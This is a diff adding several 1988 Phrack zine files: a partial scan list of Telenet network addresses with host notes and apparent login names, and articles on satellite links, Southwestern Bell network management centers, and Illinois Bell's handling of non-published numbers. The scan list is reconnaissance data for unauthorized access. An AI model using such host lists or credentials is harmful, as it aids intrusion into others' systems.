+USA 03106 001769        S.C. JOHNSON & SON R & D COMPUTER SYSTEMS
+USA 03106 001789        HOST WYLBUR.N - CICS TWX A,C,D,G,H,P,R,S,V,Z
+USA 03106 001799        (HOST) classes: 5 - VM/370, 20,23,26 UNKNOWN
+                        (TRIED TO 32)
+USA 03106 001807
+USA 03106 001817        MITEL Host (no luck up to sys 20)
+USA 03106 001819        TMCS PUBLIC NETWORK
+USA 03106 001831        MULTICS
+USA 03106 001842
+USA 03106 001844
+USA 03106 001851
+USA 03106 001853
+USA 03106 001854
+USA 03106 001857
+USA 03106 001864        SUNGARDS CENTRAL COMPUTER FACILITY NETWORKS
+USA 03106 001873        MULTICS MR10.2I
+USA 03106 001874
+USA 03106 001880
+USA 03106 001881
+USA 03106 001892        PRIMENET (certain hours)
+USA 03106 001897
+USA 03106 001912
+USA 03106 001977
+USA 03106 002040
+USA 03106 002041
+USA 03106 002046        MITEL CORP IN KANATA
+USA 03106 002050        TYMNET/BOFANET inter-link,ABACIS,SFDCS1
+                                       1 - link,
+                                       2 - SFDCS1,DIRECTOR,
+                                       3 - ABACIS,ABACIS
+                                       A - ABACIS 2
+                        (note, Abacis may be used as
+                         U/N for many systems on tymnet)
+USA 03106 002060
+USA 03106 002070
+USA 03106 002086
+USA 03106 002095        COMODEX ONLINE SYSTEM
+USA 03106 002098        D & B,COMMANDO,DIRECTOR,FUCK
+USA 03106 002099        D & B,COMMANDO,ASSASIN,SHIT
+USA 03106 002100        D & B,COMMANDO,DIRECTOR,FUCK,RAIDER
+USA 03106 002109        TYMNET/15B  (inter-link)
+USA 03106 002164        MITRE SYSTEM
+USA 03106 002179
+USA 03106 002188
+USA 03106 002196
+USA 03106 002200
+USA 03106 002201
+USA 03106 002212
+USA 03106 002222
+USA 03106 002286        Primenet TFGI
+USA 03106 002299        CONSILIUM
+USA 03106 002306
+USA 03106 002314
+USA 03106 002320
+USA 03106 002329        MFE
+USA 03106 002330
+USA 03106 002384
+USA 03106 002387        ** TO BE INVESTIGATED **
+USA 03106 002391
+USA 03106 002408
+USA 03106 002418        UNC VAX
+USA 03106 002443        DATAHUB
+USA 03106 002445
+USA 03106 002446
+USA 03106 002453        PRIMENET
+USA 03106 002470
+USA 03106 002496        NOS SOFTWARE SYSTEM
+USA 03106 002519
+USA 03106 002537
+USA 03106 002539        TYMNET/CIDN Inter-link
+USA 03106 002545        CENTRE FOR SEISMIC STUDIES
+USA 03106 002578        SEL
+USA 03106 002580        ** to be investigated **
+USA 03106 002584        (HOST)
+USA 03106 002602        MULTICS
+USA 03106 002603        MULTICS system M
+USA 03106 002609        CON5
+USA 03106 002614        HOST
+USA 03106 002623        VAX/VMS,GUEST
+USA 03106 002624        SUNEX-2060 TOPS-20
+USA 03106 002632
+USA 03106 002635        QUOTDIAL
+USA 03106 002646
+USA 03106 002657
+USA 03106 002667
+USA 03106 002677        THE TIMES
+USA 03106 002694        PVM3101,SPDS/MTAM, MLCM,VM/SP,STRATUS-1,STRATUS-2
+USA 03106 002700        ANALYTICS SYSTNE
+USA 03106 002709        AUTONET
+USA 03106 002713
+USA 03106 002730
+USA 03106 002732
+USA 03106 002744
+USA 03106 002765        MULTICS
+USA 03106 002768        (cierr 1402)
+USA 03106 002779        SCJ TIMESHARING
+USA 03106 002790        VM/370
+USA 03106 002800
+USA 03106 002807        ISC
+USA 03106 002824
+USA 03106 002842
+USA 03106 002843
+USA 03106 002851        CHEM NETWORK DTSS
+USA 03106 002864        RCA SEMICUSTOM
+USA 03106 002871        (same as 5603)
+USA 03106 002875        (cierr 1402) MTECH/COMMERCIAL SERVICES DIVISION
+USA 03106 002889        ** to be investigated **
+USA 03106 002901
+USA 03106 002910        (CIERR 1402)
+USA 03106 002921        CHRYSLER NETWORK
+USA 03106 002971
+USA 03106 002991        US MIS IS400
+USA 03106 002995        VAIL VAX
+USA 03106 002998        TYMNET/FIRN DATE NETWORK Inter-link
+USA 03106 003002        MULTICS
+USA 03106 003009
+USA 03106 003028        DCOM class - 0
+USA 03106 003030        DCOM class - 0 *investigate*
+USA 03106 003036
+USA 03106 003050        ATPCO FARE INFORMATION SYSTEM
+USA 03106 003062        (Host) class 0,1 ** to be investigated **
+USA 03106 003079        VM/370
+USA 03106 003092        TYMNET/PROTECTED ACCESS SERVICE SYS. Inter-link
+USA 03106 003168        VM/370
+USA 03106 003214        VM/370
+USA 03106 003220        VM/370
+USA 03106 003221        VM/370
+USA 03106 003248
+USA 03106 003284        COMPUFLIGHT
+USA 03106 003286        VAX
+USA 03106 003295        TYMNET/PROTECTED ACCESS SERVICE SYSTEMS
+                        Inter-link,ABACIS
+USA 03106 003297        TYMNET/PROTECTED ACCESS SERVICE SYSTENS
+                        Inter-link,ABACIS
+USA 03106 003310
+USA 03106 003321
+USA 03106 003356
+USA 03106 003365
+USA 03106 003373        IOCSQ
+USA 03106 003394        (HOST WYN) 1 - VM/370,
+                                   2 - VM/370,
+                                   3 - IKJ53020A,
+                                   5 - VM/370
+                                   6 - NARDAC  <CR> - NARDAC
+USA 03106 003420
+USA 03106 003443        ** TO BE INVESTIGATED **
+USA 03106 003520
+USA 03106 003527
+USA 03106 003529        (CIERR 1402)
+USA 03106 003534
+USA 03106 003564        (CIERR 1402)
+USA 03106 003568        OAK TREE SYSTEMS LTD
+USA 03106 003572        NORTH AMERICA DATA CENTRE
+USA 03106 003579
+USA 03106 003604        VM/370
+USA 03106 003605
+USA 03106 003623
+USA 03106 003797
+USA 03106 003828        TYMNET/AKNET Inter-link
+USA 03106 003831
+USA 03106 003846        (same as 5603)
+USA 03106 003879        (CIERR 1402)
+USA 03106 003882        BEKINS COMPANY MUS/XA ACF/VTAM NETWORK
+USA 03106 003946
+USA 03106 003973        FORD -ELECTRICAL ELECTRONIC DIRECTORY
+USA 03106 003994        FORD -ELECTRICAL ELECTRONIC DIRECTORY
+USA 03106 004007
+USA 03106 004016
+USA 03106 004028        MDS-870
+USA 03106 004041        RCA GLOBCOM'S PACKET SWITCHING SERICE
+USA 03106 004092
+USA 03106 004125
+USA 03106 004129        ---,ABACIS
+USA 03106 004131        ---,ABACIS
+USA 03106 004137        TSO, VM/370
+USA 03106 004173
+USA 03106 004174        VM/370
+USA 03106 004202
+USA 03106 004206        MAINSTREAMS
+USA 03106 004210
+USA 03106 004288
+USA 03106 004296
+USA 03106 004341        (HOST) 2 - VM/370, T - VM/370, 1,3,4,A,C,E,Z
+USA 03106 004350        AEC ** TO BE INVESTIGATED **
+USA 03106 004365        NATIONAL LIB.OF MEDICINE'S TOXIC.DATA NETWORK
+USA 03106 004389        BUG BUSTING MACHINE OF NYN
+USA 03106 004468        BETINS COQ,6R5u(VACF/VTAM NETWORK
+USA 03106 004472        ROLM CBX DATA-SWITCHING
+USA 03106 004499        MRCA
+USA 03106 004514        US MISS (IS400)
+USA 03106 004530        (Host) active centre AA, ** investigate ! **
+USA 03106 004541        (Host)
+USA 03106 004545        HMN
+USA 03106 004555        2 CASTER BACKUP
+USA 03106 004562
+USA 03106 004573
+USA 03106 004579
+USA 03106 004580        TSO
+USA 03106 004619
+USA 03106 004645
+USA 03106 004702        PRIMENET
+USA 03106 004706        (Host)
+USA 03106 004726        NALCOCS DEC-10
+USA 03106 004743        TYMNET INFO SERVICE
+USA 03106 004755        STORE DEVELOPMENT MACHINE
+USA 03106 004759        (Host)
+USA 03106 004791        MIS GROUP/CAD DIVISION/COMPUTERLAND CORP.
+USA 03106 004828        VTAM007
+USA 03106 004865        GAB BUSINESS SERVICES
+USA 03106 004869
+USA 03106 004898
+USA 03106 004946
+USA 03106 004949
+USA 03106 004956        (Host)  0 - Vax,
+                                1 - KL1,
+                                2 - KL,
+                                3 - IBM,
+                                8 - VAX 2,
+                               11 - PC1-130
+USA 03106 004957        NEC SEMI-CUSTOM DESIGN CENTRE
+USA 03106 005018        (Host)
+USA 03106 005034        (cierr 1402)
+USA 03106 005058
+USA 03106 005062        UIS SUPPB=MQDIRNET
+USA 03106 005080
+USA 03106 005082        COMPAQ
+USA 03106 005107
+USA 03106 005119        (Host)
+USA 03106 005124        OPERATIONAL INFO SYSTEM VAX
+USA 03106 005136        ** to be investogated **
+USA 03106 005224        (Host)
+USA 03106 005229        UNIV.OF PENNSYLVANIA SCHOOL OF ARTS AND SCIENCE
+USA 03106 005267        CHANEL 01
+USA 03106 005320        (Host) US DIGMAL COMPUTER SERVICES
+USA 03106 005433
+USA 03106 005438
+USA 03106 005453
+USA 03106 005463        VM/370
+USA 03106 005528        STRATUS/32
+USA 03106 005531        STRATUS/32
+USA 03106 005539        VA II/730
+USA 03106 005564        STRATUS/32
+USA 03106 005566        Host sys  A,1 - 3M TRAC SERVICE system ALICE
+                                  B,2 - 3M TRAC SERVICE system BAMBI
+                                    3 - 3M TRAC SERVICE system CHIP
+                                    4 - 3M TRAC SERVICE system DALE
+                                    5 - 3M TRAC SERVICE system ELLIOT
+                                    6 - 3M TRAC SERVICE system FLOWER
+                                 12,7 - 3M TRAC SERVICE system GRUMPY
+                                    8 - TRAC CLUSTER VIRGO, SYSTEM HAPPY
+                                    9 - TRAC CLUSTER VIRGO, SYSTEM ISABEL
+                                   10 - TRAC CLUSTER VIRGO, SYSTEM JUMBO
+                                   11 - TRAC CLUSTER VIRGO, SYSTEM KANGA
+                                   13 - VAX
+                                   18 - DIGITAL ETHERNET
+                                   28 - unknown
+                                   31 - CIERR 1402
+                                   32 - CIERR 1402
+                                   33 - CIERR 1402
+                                   34 - CIERR 1402
+                                   35 - CIERR 1402
+                                   36 - unknown
+                                   37 - CIERR 1402
+                                   38 - unknown
+                                   40 - CPU-STP-A
+                                   41 - CIERR 1402
+                                   43 - UNKNOWN
+                                   44 - ATLAS VAX
+                                   45 - FAXON INFO SERVICE
+                                   46 - ELECTRICAL PRODUCTS
+                                        LABORATORY VASX II/750
+                             47,48,49 - unknown
+                                   52 - SERC COMPUTER RESOURCES VAX
+                                   53 - unknown
+                                   54 - SERC COMPUTER RESOURCES VAX
+                                   55 - BDS UNIX
+                                81,61 - TRAC CLUSTER LIBRA system LADY
+                                   62 - TRAC CLUSTER LIBRA system MICKEY
+                                   63 - TRAC CLUSTER GEMINI system NEMO
+                                   64 - TRAC CLUSTER GEMINI system OWL
+                                   65 - TRAC CLUSTER LIBRA system PLUTO
+                                   67 - TRAC CLUSTER GEMINI system QUASAR
+                                   68 - unknown
+                                   70 - TRAC TIMESHARING VAX
+                                   71 - TRAC TIMESHARING VAX
+                                   72 - TRACE TIMESHARING VAX
+                                   73 - DIGITAL ETHERNET TERMINAL SERVER
+                                   74 - TRAC TIMESHARING VAX
+                                   76 - TRAC TIMESHARING VAX
+                                   81 - TRAC TIMESHARING VAX
+USA 03106 005569        STRATUS/32
+USA 03106 005571        STRATUS/32
+USA 03106 005603        (Host) systems 1,2,3,4,5,C (5=Outdial)
+USA 03106 005622
+USA 03106 005683        TECHNICAL SUPPORT PRODUCTIONS
+USA 03106 005697
+USA 03106 005702        AUTH
+USA 03106 005704        SPOOL
+USA 03106 005705
+USA 03106 005706
+USA 03106 005707
+USA 03106 005708        IFPSE
+USA 03106 005709        IFPSE
+USA 03106 005711        IFXMP
+USA 03106 005712
+USA 03106 005725        PRIMENET
+USA 03106 005744        (Cierr 1402)
+USA 03106 005755        Host system, active links = A,B,C,E,F,H,G,I,
+                                                    J,K,L,M,O,P,Q,R,
+                                                    S,T,U,V,W,X,Y,Z
+USA 03106 005758        SEI/MUS SYSTEM
+USA 03106 005805
+USA 03106 005818        CORPORATE MANAGEMENT INFO SYSTEMS
+USA 03106 005846        (Host)
+USA 03106 005897
+USA 03106 005903
+USA 03106 005941
+USA 03106 005969        PLESSEY SEMICONDUCTORS-IRVINE
+USA 03106 005984        CREDIT AGRICOLE-USA
+USA 03106 006019        PRIMENET
+USA 03106 006046
+USA 03106 006093        NALCO CHEMICAL COMPANY NETWORK
+USA 03106 006121        CORPORATE MANAGEMENT INFO SERVICE
+USA 03106 006187
+USA 03106 006190        CLEVELAND
+USA 03106 006191
+USA 03106 006227
+USA 03106 006251
+USA 03106 006281        EDCS
+USA 03106 006283        EDCS
+USA 03106 006296
+USA 03106 006432        EASYLINK
+USA 03106 006434        EASYLINK
+USA 03106 006440
+USA 03106 006590        US CENTRA SERVICE
+USA 03106 006597
+USA 03106 006686
+USA 03106 006722        INTERNATIONAL NETWORK
+USA 03106 006828
+USA 03106 006832        A&A DATANET (SYSTEMS 1,8,0,14)
+USA 03106 006833        (GO AWAY)
+USA 03106 006834
+USA 03106 006835        TOC
+USA 03106 006867        DATABILITY TIMESHARING SYSTEM II
+USA 03106 006994
+USA 03106 007028
+USA 03106 007103
+USA 03106 007177
+USA 03106 007272        (CIERR 1402)
+USA 03106 007351        PRIMENET
+USA 03106 007352        PRIMENET
+USA 03106 007377
+USA 03106 007596        (Host)  A - VM/370, B - VM/370
+USA 03106 007640
+
+- J. Sluggo
+_______________________________________________________________________________
diff --git a/phrack21/5.txt b/phrack21/5.txt
new file mode 100644
index 0000000..ea847d7
--- /dev/null
+++ b/phrack21/5.txt
@@ -0,0 +1,149 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 21, File 5 of 11
+
+           /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
+           \/                                                    \/
+           /\              Satellite Communications              /\
+           \/              ~~~~~~~~~~~~~~~~~~~~~~~~              \/
+           /\                  By Scott Holiday                  /\
+           \/                    July 11, 1988                   \/
+           /\                                                    /\
+           \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
+
+Satellite communications systems employ microwave terminals on satellites and
+ground to earth stations for highly reliable and high-capacity communications
+circuits.  The communication satellites are positioned in geosynchronous orbits
+about 22,000 miles above the earth.  Thus the rotation of the satellite matches
+that of the earth, and the satellite appears motionless above earth stations.
+Three equally spaces satellites are required to cover the entire world.
+
+The satellite's microwave terminals receive signals from an earth station and
+retransmit those signals on another frequency to another earth station.
+Because of the long distances involved, the round-trip communications path
+takes about a half second.  This is referred to as the propagation delay.  The
+propagation delay on a regular terrestrial phone line is about 1 millisecond
+(ms) per 100 miles.
+
+Each microwave terminal on the satellite, designated as a repeater or
+transponder, includes a receiver for uplink transmissions and a transmitter for
+down-link transmissions.  Separate bands of frequencies for up-link and
+down-link transmissions are designated in the 1.5-30 GHz frequency range (1.5
+GHz is equal to 1,500,000,000 Hz, or 1.5 billion hertz).  Typical frequencies
+for communications satellites are 4-6 GHz for INTELSAT 5 and 12-14 GHz for
+Anik-B, a Canadian satellite.
+
+Each satellite transponder typically has twelve 36-MHz channels which can be
+used for voice, data, or television signals.  Early communications satellites
+had some 12 to 20 transponders, and the later satellites have up to 27 or more
+transponders.  INTELSAT 5, for example, has a total of 27 or more transponders
+providing 24,500 data/voice channels, one transponder providing two 17.5-MHz TV
+channels, and one SPADE transponder with 800 channels.  SPADE (Single carrier
+per channel, Pulse code modulation, multiple Access, Demand assignment) is a
+digital telephone service which reserves a pool of channels in the satellite
+for use on a demand-assignment basis.  SPADE circuits can be activated on a
+demand basis between different countries and used for long or short periods of
+time as needed.
+
+Propagation Delay:
+
+The approximate quarter second one-way propagation delay in satellite
+communications affects both voice telephone and data communications.  Users of
+voice communications via satellite links face two objectionable
+characteristics; delayed speech and return echoes.  Echo suppressors are
+installed to reduce the return echoes to an acceptable level.  Data
+communications operations face more serious problems caused by propagation
+delay.  Line protocol and error detection/correction schemes are slowed down
+dramatically by the quarter second of delay.  User response time requirements
+can be difficult to meet because of these cumulative effects.
+
+Satellite delay compensation units are available to ensure a connection and
+afford better operation for the terrestrial communications terminal that were
+never designed to deal with the propagation delay of communications satellites.
+One delay compensation unit is required at each final destination.  The units
+reformat the data into larger effective transmission blocks so that
+retransmision requests are sent back less frequently.  This reduces the number
+of line turnarounds, each of which requires about a quarter second to go from
+or return to the destination terminal or computer.  One error detection and
+correction method used, called GO-BACK-N, requires that all blocks of data held
+in the transmitting buffer, back to the one with the error in it, must be
+retransmitted.  A more efficient method is to retransmit only the block of data
+with the error, but this requires more logic in the equipment at each end.
+
+Link to Earth Stations:
+
+Most users cannot afford a satellite earth station, so a land line is needed
+for a connection to the nearest earth station (Which they tell me is 65,000 bps
+for a leased line).  Because of the great distance the signal must travel in
+space, the relatively short distance between the two users on earth becomes
+insignificant and actually does not affect the operating cost.  It is generally
+not economical.  This is particularly true of high-capacity or broadband
+applications.  Even though operating costs are insensitive to distance,
+satellite companies may still charge more for longer distances based on
+terrestrial line competition.
+
+Nonterrestrial Problems:
+
+The nonterrestrial portion of satellite communications bypasses the problems
+encountered with broken phone lines, etc., but it has its own unique set of
+problems.  Since satellite communications employ high-frequency microwave
+radio transmission, careful planning is required to avoid interference between
+the satellite and other microwave systems.  Eclipses of the sun, and even the
+moon, can cause trouble because they cut off the source of energy for the
+satellite's solar batteries.  Backup batteries are used to resolve most of
+these difficulties, but the problem that is the most severe is when the sun
+gets directly behind the satellite and becomes a source of unacceptable noise.
+This occurs 10 times a year for about 10 min each time.  In order to obtain
+uninterrupted service, an earth station must have a second dish antenna a short
+distance away or the single dish antenna must have access to another satellite.
+
+Accessing the Satellite:
+
+There are three methods by which multiple users (earth stations) can access the
+satellite.  The first is frequency-division multiple access (FDMA), whereby the
+total bandwidth is divided into separate frequency channels assigned to the
+users.  Each user has a channel, which could remain idle if that user had no
+traffic.  Time-division multiple access (TDMA) provides each user with a
+particular time slot or multiple time slots.  Here the channels are shared, but
+some time slots could be idle if a user has no traffic to offer.  With
+code-division multiple access (CDMA) each user can utilize the full bandwidth
+at any time by employing a unique code to identify the user's traffic.  There
+are, of course, trade-offs among the three methods; they involve error rate,
+block size, throughput, interference, and cost.
+
+Advantages:
+
+o     Satellite lines are exceptionally well suited for broadband applications
+      such as voice, television, and picture-phone, and the quality of
+      transmission is high.
+o     Satellite lines are generally less expensive for all voice and data
+      types of transmission, whether it be dial-up or a leased line that is not
+      short.  This is particularly true of overseas transmissions, and there is
+      no underwater cable to create maintenance problems.
+
+Disadvantages:
+
+o    The propagation delay of about a quarter second way requires the
+     participants of a voice conversation so slightly delay their responses to
+     make sure no more conversation is still on the way.  The propagation delay
+     has more of a severe effect on the transmission of data, and the effect
+     becomes more pronounced with high speeds, half duplex operation, smaller
+     blocks of data, and polling.  Satellite delay units, front end processors,
+     multiplexers, and other devices have been designed to get around these
+     problems, but there is no solution to the half second lost in total
+     response time for interactive applications.
+o    Some of the modems currently in use today have not been designed to handle
+     the long delay of the initial connection via satellite, and the result can
+     be a lost connection.  This can be frustrating when the common carrier
+     elects to use satellite lines for regular dial-up calls up to say, 55
+     percent of all calls out of a particular city during the busy traffic
+     periods.
+
+Closing:
+
+Satellite communications is a very interesting topic to study.  Perhaps even
+the present/and future satellite and Ham radio "Hackers" will one day be
+running a Bulletin Board off of a WESTSTAR satellite -- Who's to say there
+isn't one now? (Devious Snicker)
+
+     --Scott Holiday
diff --git a/phrack21/6.txt b/phrack21/6.txt
new file mode 100644
index 0000000..843afa8
--- /dev/null
+++ b/phrack21/6.txt
@@ -0,0 +1,223 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 21, File 6 of 11
+
+   <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+   <>                                                                    <>
+   <> Organizations Supporting The Telecommunications Network Operations <>
+   <>                                                                    <>
+   <>                      NETWORK MANAGEMENT CENTER                     <>
+   <>        _____________________________________________________       <>
+   <>       |                                                     |      <>
+   <>       | A description of the Network Management Center/NMC  |      <>
+   <>       | and its role in providing the best possible service |      <>
+   <>       | to the customers of the telecommunications network. |      <>
+   <>       |_____________________________________________________|      <>
+   <>                                                                    <>
+   <>                          Brought to you by                         <>
+   <>                    Knight Lightning & Taran King                   <>
+   <>                                                                    <>
+   <>                           August 9, 1988                           <>
+   <>                                                                    <>
+   <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+Introduction To Network Management - Southwestern Bell Telephone Company
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Modern Telecommunications Networks, relying on direct customer input and common
+and stored program controlled switching, are generally very reliable and have
+provided the means to supply low cost telecommunication service to all who
+desire it.  Because these networks are designed on the probability that all
+customers do not require service simultaneously, they are engineered and
+equipped to provide acceptable levels of service during normal traffic load
+periods.  When customer demands or equipment malfunctions cause a deviation
+from the engineered requirements or heavier than normal calling occurs, modern
+networks can become congested and network throughput can be affected.
+
+              Network Management provides a means to improve the
+            performance of the network during these contingencies.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                            Purpose And Objectives
+                            ~~~~~~~~~~~~~~~~~~~~~~
+The Network Management Centers purpose is to provide the constant surveillance
+and control activities necessary to maintain the network at its optimum level
+of performance.  This includes the Bell Operating Company (BOC) Intra-Lata
+Networks and Inter-Exchange Facilities and Circuits.
+
+NMC's objective is to meet customer and market needs and expectations, and at
+the same time, maximize revenues derived from the provision of network service.
+
+While the NMC cannot guarantee a certain level of service to the customer, it
+can ensure the most effective use of existing network capacity in all
+situations.  This will result in:
+
+     - More completed calls
+     - Higher return on network capital investment
+     - Better customer service
+     - Protection of essential services such as 911, during abnormal network
+       situations
+     - Ensuring equal access
+     - Assisting in national security and emergency preparedness
+
+The NMC has the capability to alter or change the switching network on a near
+real-time basis.  This is accomplished thru Network Control Actions in the
+switching machines.  Control messages from the NMC are acted upon by the
+switching machines to either expand capacity by utilizing idle equipment and
+trunks or to restrict the network by denying access to traffic that has a poor
+chance of completion, thereby freeing equipment and trunks for traffic that has
+a good chance of completion.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                 Principles And Responsibilities Of Operations
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+In accomplishing the purpose and objective of the NMC, decision on network
+control actions are guided by standard principle applicable to switching
+technology or network architecture.  All network management control actions are
+generally based upon at least one of the standard principles.
+
+Inhibit Switching Congestion
+----------------------------
+Large numbers of ineffective attempts in a switching machine due to traffic
+overload or equipment malfunctions can exceed the engineered capacity of the
+system.  If not controlled, this congestion can spread to other connected
+switching systems.  Network management controls are available that remove
+ineffective attempts to a congested machine, inhibiting switching congestion
+and preventing its spread to adjacent switching systems.
+
+Use All Available Trunks
+------------------------
+The switching network is sized and equipped to accommodate the average business
+day calling requirements.  Focused overloads (storms, holidays, floods, and
+civil disturbances) can often result in greatly increased calling patterns for
+which the network is not designed.  This aberration can also be caused by
+facility failures and switching system outages.  In these cases some trunk
+groups are greatly overloaded while others may be virtually idle.  Network
+management reroutes can be activated in many of these cases to use temporary
+idle capacity in the network, thereby completing calls that would otherwise be
+blocked.
+
+Keep All Trunks Filled With Messages
+------------------------------------
+A message is a completed call.  Since the network is normally trunk limited, it
+is important to optimize the ratio of messages (revenue) to non-messages (non
+revenue producing) on any trunk group.  When unusual or abnormal conditions
+occur in the network that cause increased short holding time calls (non-message
+such as busy tone, reorder tone, recorded announcement, and high-and-dry - dead
+air), the number of carried messages decreases because non-message traffic is
+occupying a larger percentage of system capacity.  Network management controls
+are designed to reduce non-message traffic and allow more calls to complete.
+This results in higher customer satisfaction and increased revenue for the
+industry.
+
+Give Priority To Single-Link Connections
+----------------------------------------
+In networks designed to automatically alternate route calls, the most efficient
+use of available trunking occurs when traffic loads are at (or below) normal
+engineered values.  When the engineered traffic load is exceeded, more calls
+alternate route and therefore are required to use more than one trunk in order
+to complete a call.  During overload situations, the use of more than one trunk
+to complete a call occurs more often and the possibility of a multilink call
+blocking other call attempts is greatly increased.  Thus, in some cases, it
+becomes necessary to use network management controls to limit alternate routing
+in order to give first routed traffic a reasonable chance to complete more
+calls on the network than would otherwise be completed.
+
+The responsibility of the Network Management Center is far-reaching, affecting
+many work groups and organizations both in Southwestern Bell Telephone Company,
+other telephone companies, and the customers.
+
+The NMC provides:
+
+     - Real-time surveillance and control of the switching network
+     - Identifying abnormal network situations
+     - A centralized point for information to higher management, IC's,
+       Independent Companies, and other BOC's.
+     - A focal point for national security and emergency preparedness concerns
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                            The System -- A Picture
+                            ~~~~~~~~~~~~~~~~~~~~~~~
+The Network Management System consists of three major components:  The
+switching network itself, the data gathering support system, and the
+surveillance and control system (NMC).
+
+The NMC is driven by customer actions in the switching network which are
+recorded and displayed via the EADAS/NM (Engineering Administration Data
+Acquisition System for Network Management).  Network management control actions
+are directed from the CRT to the switching network via the same system.
+
+Diagram;
+           Switching             Data Gathering        NMC Surveillance
+            Network                  System               and Control
+         ____________          __________________     ______________________
+        /            \        /                  \   /                      \
+         ____________                         ___      _______________
+        |            |_______________________|   |    |               |
+        |   Access   |                       | E |   /| Display Board |
+        |   Tandem   |         ___           | A |  / |_______________|
+        |            |        |   |__________| D | /
+        | End Office |________| E | Data     | A |/
+        |            |        | A |__________| S |\
+        |   Equal    |        | D | Network  | / | \
+        |   Access   |        | A | Controls | N |  \
+        | End Office |        | S |__________| M |   \
+        |____________|        |___|          |   |    \   __________________
+                                |            |   |     \ |                  |
+                               _|_           |   |      \| Cathode Ray Tube |
+                              /   \          |   |       |__________________|
+                              \___/          |___|
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Introducing:        The Southwestern Bell Telephone Company
+                          Network Management Centers
+        ___________________
+       |                   |
+    ___| Southwestern Bell |__________________________________________
+   |   |   Corporations    |          |               |               |
+   |   |___________________|    ______|_______  ______|_______  ______|_______
+   |                           |              ||              ||              |
+   |                           |   SW Bell    ||   SW Bell    ||   SW Bell    |
+   |                           |Mobile Systems||   Telecom    || Publications |
+   |                           |______________||______________||______________|
+ __|________________
+|                   |
+| Southwestern Bell |
+|     Telephone     |
+|___________________|
+   |
+   |---->   Little Rock NMC        Arkansas (Non EADAS/NM)      (501)373-5126
+   |---->   St. Louis NMC          Missouri & Kansas            (314)658-6044
+   |---->   Oklahoma City NMC      Oklahoma                     (405)278-5511 *
+   |---->   Dallas NMC             North Texas                  (214)464-2164
+   |---->   Houston NMC            South Texas                  (713)850-5662 *
+
+                                * - After hours, this number goes to a beeper,
+                                    at the tone, dial in your telephone number.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+                                    Summary
+                                    ~~~~~~~
+Network Management is the term used to describe a variety of activities
+associated with improving network traffic flow and customer service when
+abnormal conditions (unusual traffic patterns or equipment failures) may have
+resulted in a congested inefficient network.  These activities include the
+application of network controls when and where necessary and planning the means
+by which the impact of network overloads can be minimized.
+
+Network Management is based upon the use of near real-time trunk group and
+switching system data and the ability to implement appropriate network controls
+thru the use of EADAS/NM.
+
+Network Management is concerned with completing as many calls as possible
+within the Intra-Lata network and providing equal treatment for the traffic
+flow to and from all inter-exchange carriers.
+
+
+                            "The Future Is Forever"
+_______________________________________________________________________________
diff --git a/phrack21/7.txt b/phrack21/7.txt
new file mode 100644
index 0000000..66a6cdf
--- /dev/null
+++ b/phrack21/7.txt
@@ -0,0 +1,129 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 21, File 7 of 11
+
+         ()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
+         ()                                                        ()
+         ()                  Non-Published Numbers                 ()
+         ()                  ~~~~~~~~~~~~~~~~~~~~~                 ()
+         ()             An Observation Of Illinois Bell            ()
+         ()                                                        ()
+         ()                   by Patrick Townson                   ()
+         ()                of The Portal System (TM)               ()
+         ()                                                        ()
+         ()             Special Thanks to Hatchet Molly            ()
+         ()                                                        ()
+         ()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
+
+
+All examples in this message pertain to Illinois Bell Telephone Company, which
+covers the Chicago metropolitan area, and quite a bit of the rest of Illinois.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+There are three types of phone numbers which do not appear in the printed and
+publicly available directory;
+
+     (1)  Too new to list
+     (2)  Non-listed
+     (3)  Non-published
+
+The third category of numbers not in the phone book or available from the
+Directory Assistance Bureau are non-published numbers.  Non-published numbers
+are NOT available at the directory Assistance level.  Inquiries about same
+which are input into a DA (Directory Assistance) terminal simply come up with a
+message that "at the customer's request, the number is not listed in our
+records; the number is non-published."
+
+Well, who does keep non-pub records then?  The Business Office has no handy way
+to retrieve them, since they depend on an actual phone number when they pull up
+a record to discuss an account.  Once a service order is processed, the number
+and associated name are no longer available to the average worker in the
+central office.
+
+There was for several years a small group known as the "NonPub Number Bureau"
+which at the time was located in Hinsdale, Illinois.  Needless to say, the
+phone number to the NonPub Number Bureau was itself non-published, and was only
+available to specified employees at Illinois Bell who were deemed to have a
+"need to know clearance."  Now with all the records being highly computerized,
+the keepers of the Non-Pub phone numbers are themselves scattered around from
+one phone office to another.
+
+When there is some specific need for an employee at the phone company to
+acquire the non-published number of a subscriber, then certain security
+precautions kick into place.  Only a tiny percentage of telephone company
+employees are deemed to have a "need to know clearance" in the first place;
+among these would be the GCO's (Group Chief Operators), certain management
+people in the central offices, certain people in the Treasury/Accounting
+office, and of course, security representatives both from Illinois Bell and the
+various long distance carriers, such as AT&T, US. Sprint, and MCI.
+
+Let us have a hypothetical example for our correspondent; Your mother has taken
+seriously ill, and is on her deathbed.  Your brother is unable to reach you to
+notify you of this because you have a non-pub number.  When his request for the
+number has been turned down by Directory Assistance, simply because they do not
+have it, he asks to speak with a supervisor, and he explains the problem.  He
+provides his own name and telephone number, and the supervisor states he will
+be called back at a later time.  The supervisor does not question if in fact an
